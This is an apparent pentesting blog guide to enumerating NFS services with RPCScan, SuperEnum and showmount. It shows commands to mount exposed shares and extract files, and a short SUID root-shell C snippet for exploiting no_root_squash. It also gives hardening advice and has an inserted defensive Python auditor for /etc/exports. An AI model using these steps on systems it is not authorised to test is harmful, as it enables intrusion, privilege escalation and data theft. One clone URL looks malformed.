Master NFS Enumeration with RPCScan & SuperEnum | Ultimate Bug Bounty & Pentesting Guide!

Pentester Club

Network File System (NFS) is a widely used protocol that allows remote file sharing between systems. However, misconfigurations in NFS can expose sensitive data, making it a prime target for penetration testers and bug bounty hunters. In this guide, we’ll dive deep into NFS enumeration using RPCScan and SuperEnum, two powerful tools that can help uncover vulnerabilities in NFS implementations.

NFS enables users to mount remote file systems as if they were local. When improperly configured, it can lead to:

- Unauthorized file access
- Privilege escalation
- Data leakage

- Insecure exports: Sharing directories without proper restrictions.
- No_root_squash enabled: Allowing root access to remote users.
- Weak authentication: Lack of user authentication mechanisms.

RPCScan is a powerful tool used to enumerate RPC services, including NFS.

sudo apt update && sudo apt install rpcbind nfs-common -y
git clone https://github.com/superuserRPCScan.git
cd RPCScan
chmod +x rpcscan.sh

Use RPCScan to detect NFS-related services on a target:

./rpcscan.sh -H <target-ip>

Output:

Port 111: RPCBIND running
Port 2049: NFS Service detected

If NFS is running, we can proceed with enumeration using showmount:

showmount -e <target-ip>

This reveals the exported directories.

SuperEnum is an advanced enumeration script that automates multiple reconnaissance steps.

git clone https://github.com/SuperEnum/SuperEnum.git
cd SuperEnum
chmod +x superenum.sh
./superenum.sh -t <target-ip> -m nfs

This will:
✅ Detect exposed NFS shares
✅ Attempt to mount shares anonymously
✅ Check for writable directories

If an NFS share is accessible, we can mount it locally:

sudo mkdir -p /mnt/nfs
sudo mount -t nfs <target-ip>:/exported_directory /mnt/nfs
ls -lah /mnt/nfs

This allows us to browse and extract sensitive files.

If no_root_squash is enabled, an attacker can create SUID binaries to escalate privileges:

cd /mnt/nfs
echo 'int main() { setuid(0); system("/bin/bash"); }' > exploit.c
gcc exploit.c -o exploit
chmod +s exploit

Once executed on the target machine, it grants root access.

To secure NFS servers:

- Restrict exports using /etc/exports:
  /secure_data 192.168.1.0/24(rw,root_squash,no_subtree_check)
- Use authentication mechanisms like Kerberos.
- Regularly monitor access logs.
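
One way to check a server's export table against the hardening list above, as an added example that is not from the original article: a small Python auditor that applies the exports(5) defaults (ro, root_squash, sec=sys) and flags no_root_squash, exports to any host, and entries that allow non-Kerberos access. The SAMPLE table, the issue labels and the function name are constructed for illustration; quoted paths containing spaces are not handled.

```python
import re

# Constructed sample /etc/exports; the first entry is the one recommended above.
SAMPLE = r"""
/secure_data 192.168.1.0/24(rw,root_squash,no_subtree_check)
/backups     *(rw,no_root_squash)   # any host, writable, root not squashed
/home        -sec=krb5p,rw 10.0.0.5 10.0.0.6(no_root_squash)
/projects    10.0.0.7 (rw)          # stray space: "(rw)" applies to every host
"""

SPEC = re.compile(r"^([^()\s]*)(?:\(([^)]*)\))?$")   # client(opt,opt,...)
WORLD = {"", "*", "0.0.0.0/0", "::/0"}

def audit_exports(text):
    """Return sorted (path, client, issue) tuples for risky export entries."""
    findings = set()
    for line in text.replace("\\\n", " ").splitlines():  # join continuation lines
        fields = line.split("#", 1)[0].split()            # drop comments
        if not fields:
            continue
        path, defaults = fields[0], []
        for spec in fields[1:]:
            if spec.startswith("-"):                      # defaults for later clients
                defaults = spec[1:].split(",")
                continue
            m = SPEC.match(spec)
            if not m:
                findings.add((path, spec, "unparsed"))
                continue
            client = m.group(1) or "*"                    # bare "(opts)" means any host
            rw, squash, sec = False, True, "sys"          # exports(5) defaults
            for opt in defaults + (m.group(2) or "").split(","):  # later options win
                if opt in ("rw", "ro"):
                    rw = opt == "rw"
                elif opt in ("root_squash", "no_root_squash"):
                    squash = opt == "root_squash"
                elif opt.startswith("sec="):
                    sec = opt[4:]
            if not squash:
                findings.add((path, client, "no_root_squash"))
            if client in WORLD:
                findings.add((path, client, "world-writable" if rw else "world-readable"))
            if any(not s.startswith("krb5") for s in sec.split(":")):
                findings.add((path, client, "no-kerberos"))
    return sorted(findings)

if __name__ == "__main__":
    for path, client, issue in audit_exports(SAMPLE):
        print(f"{path:14} {client:16} {issue}")
```

On the sample, the recommended /secure_data entry is flagged only for lacking Kerberos, while /backups and the stray-space /projects entry are reported as writable by any host.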

Mastering NFS enumeration with RPCScan and SuperEnum can give you an edge in bug bounty and penetration testing. By identifying misconfigurations, you can help secure organizations and uncover critical vulnerabilities.
